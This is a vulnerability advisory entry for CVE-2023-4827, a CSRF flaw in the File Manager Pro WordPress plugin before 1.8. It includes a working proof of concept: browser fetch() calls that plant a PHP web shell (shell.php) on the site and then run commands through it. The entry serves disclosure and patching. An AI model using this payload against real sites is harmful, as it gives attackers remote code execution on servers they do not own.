File Manager Pro < 1.8 – Remote Code Execution via CSRF | CVE 2023-4827 | Plugin Vulnerabilities

Description

The plugin does not properly check the CSRF nonce in the `fs_connector` AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.

Proof of Concept

As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):

await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );

Now a logged-out attacker may access `shell.php` as follows:

await (await fetch( "/shell.php?cmd=id" ) ).text()

Affects Plugins

Fixed in 1.8

References

CVE

URL

https://blog.cleantalk.org/cve-2023-4827-file-manager-pro-1-8-remote-code-execution-via-csrf

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

d4daf0e1-8018-448a-964c-427a355e005f

Timeline

Publicly Published

2023-09-11 (about 2 years ago)

Added

2023-09-11 (about 2 years ago)

Last Updated

2023-09-12 (about 2 years ago)

Other

Published

Title

Published

2024-11-09

Title

The Events Calendar < 6.7.1 - Trashed Events Restoration via CSRF

Published

2023-10-03

Title

Short URL <= 1.6.8 - CSRF

Published

2025-02-27

Title

RateMyAgent Official < 1.5.0 - Cross-Site Request Forgery to API Key Update

Published

2025-09-26

Title

Ninja Forms < 3.12.1 - Limited File Deletion via CSRF

Published

2025-01-07

Title

Virtual Bot <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting